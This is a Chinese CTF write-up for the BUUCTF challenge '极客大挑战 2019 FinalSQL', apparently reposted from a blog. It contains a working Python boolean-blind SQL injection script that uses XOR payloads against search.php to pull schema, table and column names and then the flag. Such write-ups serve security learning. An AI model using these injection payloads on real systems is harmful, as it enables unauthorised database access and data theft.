首页 > 数据库 >BUUCTF [极客大挑战 2019]FinalSQL

BUUCTF [极客大挑战 2019]FinalSQL

时间:2023-09-05 15:12:37浏览次数:58  
标签:BUUCTF FinalSQL name temp mid high 2019 low id

通过尝试发现注入点在search.php
传递?id=1^1ERROR!!!;传递?id=1^0NO! Not this! Click others~~~
布尔盲注

import requests
import time

url = "http://eab3a4cf-d57d-4236-a9f9-1383446ba4e1.node4.buuoj.cn:81/search.php?"

result = ''
temp = {"id" : ""}

for i in range(1,1000):
    low = 27
    high = 126
    mid = (int)((high+low)/2)

    while high > low:
        time.sleep(0.1)
        # database--geek
        temp["id"] = "1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)" % (i, mid)
        # table--Flaaaaag--F1naI1y
        temp["id"] = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(database_name)='geek'),%d,1))>%d)" % (i, mid)
        # column-fl4gawsla--password
        temp["id"] = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='F1naI1y'),%d,1))>%d)" % (i, mid)
        # flag
        temp["id"] = "1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)" % (i, mid)
        r = requests.post(url, params=temp)
        # print(r.text)
        if 'ERROR' in str(r.text):
            low = mid + 1
        else:
            high = mid 

        mid = (int)((high+low)/2)
    result += chr(int(mid))

print(result)

得到flag{6657ba5b-f5b1-47a4-a41f-e270acfb48cb}




参考链接:
https://blog.csdn.net/satasun/article/details/109703332

标签:BUUCTF,FinalSQL,name,temp,mid,high,2019,low,id
From: https://www.cnblogs.com/darkcyan/p/17679165.html

相关文章

  • P5812 [IOI2019] 天桥
    优化建图,首先分几种情况讨论。假设当前的桥\(l,r,h\)。起点和终点是\(S,T\)。第一种情况:\(S\leql<r\leqT\)。容易发现如果要从这条天桥中间上这条天桥,一定经过\(l\)或\(r\),不如直接走上去。所以只用保留\((l,h),(r,h)\)和他们往下的一个其他天桥与该楼的交点,这个交......
  • 【ToolChains】CLion(VS2019) + CMake + Vcpkg 的使用
    参考博客:https://blog.51cto.com/u_15075510/4201238http://t.csdn.cn/pADDUhttps://zhuanlan.zhihu.com/p/454233496https://blog.csdn.net/weixin_43803955/article/details/123544106Vcpkg概述Vcpkg是微软社区开发的一个跨平台的C++包管理工具。它旨在解决C++......
  • Visual Studio 2019快捷键
    Ctrl+J/Ctrl+K,L:列出成员Ctrl+Shift+空格键/Ctrl+K,P:参数信息Ctrl+K,I:快速信息Ctrl+E,C/Ctrl+K,C:注释选定内容Ctrl+E,U/Ctrl+K,U:取消选定注释内容Ctrl+K,M:生成方法存根Ctrl+K,X:插入代码段Ctrl+K,S:插入外侧代码F12:转到所调用过程或变量的定义C......
  • vs2019快捷键注释不起作用
      使用:  再一次:Ctrl+/ 反注释。 ......
  • BUUCTF [SWPU2019]Web1
    进入网站,注册登录,进到申请发布广告,应该就是在这里实现注入。首先尝试:1'or1=1#标题含有敏感词汇应该是哪里被过滤了。经过尝试后是or被过滤了,--+,#等其他的注释符也被过滤了。经过测试后,结尾可以用单引号闭合。再次尝试:1'showdatabases()'1'showdatabases()'空格被......
  • BUUCTF [CISCN2019 华东南赛区]Web11
    切入点如图:测试模板注入最后或者payload:X-Forwarded-For:{ifreadfile('/flag')}{/if}原理是Smarty已经废弃{php}标签。在Smarty3.1,{php}仅在SmartyBC中可用。Smarty的{if}条件判断和PHP的if非常相似,只是增加了一些特性。每个{if}必须有一个配对的{/if}。全部的PHP条件表......
  • BUUCTF [网鼎杯 2020 朱雀组]Nmap
    payload:127.0.0.1|'<?=@eval($_POST["hack"]);?>-oGhack.phtml'nmap`-oG`:将扫描结果输出到一个文本文件中,G代表生成一种称为"grepableoutput"(可用于grep命令的输出)的格式,这种格式是一种易于处理的文本格式。写入`hack.phtml`而不是`hack.php`的原因在于php可能被过......
  • BUUCTF [BUUCTF 2018]Online Tool
    首先访问网站得到需要分析的代码<?phpif(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){$_SERVER['REMOTE_ADDR']=$_SERVER['HTTP_X_FORWARDED_FOR'];}if(!isset($_GET['host'])){highlight_file(__FILE__);}else{$hos......
  • P5665 [CSP-S2019] 划分 做题记录
    题目传送门题目描述2048年,第三十届CSP认证的考场上,作为选手的小明打开了第一题。这个题的样例有\(n\)组数据,数据从\(1\simn\)编号,\(i\)号数据的规模为\(a_i\)。小明对该题设计出了一个暴力程序,对于一组规模为\(u\)的数据,该程序的运行时间为\(u^2\)。然而这个程序......
  • Luogu P5290 [十二省联考 2019] 春节十二响
    LuoguP5290[十二省联考2019]春节十二响题目链接题目大意一颗有根树,有点权,把点分成若干个集合,要求每个集合内不包含祖先关系,求集合的最大值的和的最小值.做题思路考虑合并两个集合,我们只需要不停把分别吧两个集合的最大值取出取max加入答案,再把大集合剩下的内......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99